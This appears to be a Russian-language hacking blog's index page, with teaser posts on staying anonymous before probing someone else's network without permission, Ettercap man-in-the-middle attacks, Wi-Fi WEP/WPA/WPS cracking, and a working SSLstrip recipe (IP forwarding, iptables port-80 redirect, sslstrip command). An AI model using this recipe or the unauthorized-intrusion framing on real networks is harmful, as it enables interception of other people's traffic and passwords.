Что нужно сделать перед вторжением в чужую сеть.

Если вы вдруг решили проверить безопасность чужой сети, не спросив на это разрешения у её владельца(ай-я-яй), то стоит обеспокоиться сохранением собственной анонимности. Для этого достаточно выполнить несколько описанных ниже действий.

Читать далее

Установка Ettercap на Mac OS

Ettercap — бесплатный сетевой инструмент с открытым исходным кодом для проведения атаки «Человек посередине». Может быть использован для анализа сетевых протоколов и проверки безопасности. Работает на различных Unux-like операционных системах, включая Linux, Mac OS, BSD и Solaris, а также Microsoft Windows. Он способен перехватывать трафик в сегменте сети, получать пароли и активно подслушивать ряд распространенных протоколов.

Читать далее

SSLstrip вскрытие зашифрованного трафика

Настройка

echo "1" > /proc/sys/net/ipv4/ip_forward

Использование
Теория:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 'listenPort'
sslstrip -l  'listenPort'

Практика:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1313
sslstrip -l 1313

Получаем свободное место в Dropbox

Недавно мне друг скинул массивный файл в дропбокс, и мой без того скудный объем свободного места в 4гб был полностью заполнен. Да куда уж там, полностью переполнен в 2 раза.. К сожалению, дропбокс не дал мне возможность получить доступ к файлу, и тут я задумался написать скрипт для получения свободного места.

Читать далее

Взлом WPA / WPA 2

WPA и WPA2 (Wi-Fi Protected Access) — представляет собой обновлённую программу сертификации устройств беспроводной связи. Технология WPA пришла на замену технологии защиты беспроводной Wi-Fi сети WEP. Плюсами WPA являются усиленная безопасность данных и ужесточённый контроль доступа к беспроводным сетям. Немаловажной характеристикой является совместимость между множеством беспроводных устройств как на аппаратном уровне, так и на программном. На данный момент WPA и WPA2 разрабатываются и продвигаются организацией Wi-Fi Alliance.

Читать далее

Взлом WEP

Wired Equivalent Privacy (WEP) — алгоритм для обеспечения безопасности сетей Wi-Fi. Используется для обеспечения конфиденциальности и защиты передаваемых данных авторизированных пользователей беспроводной сети от прослушивания. Существует две разновидности WEP: WEP-40 и WEP-104, различающиеся только длиной ключа. В настоящее время данная технология является устаревшей, так как ее взлом может быть осуществлен всего за несколько минут. Тем не менее, она продолжает широко использоваться. Для безопасности в сетях Wi-Fi рекомендуется использовать WPA. WEP часто неправильно называют Wireless Encryption Protocol.

Читать далее

Получаем доступ к Wifi сети через WPS.

В декабре 2011 Стефан Фибёк (англ. Stefan Viehböck) и Крейг Хеффнер (англ. Craig Heffner) рассказали о серьёзных прорехах в протоколе WPS. Оказалось, что если в точке доступа активирован WPSPIN (который по умолчанию включен в большинстве роутеров), то подобрать PIN-код для подключения можно за считанные часы.

Читать далее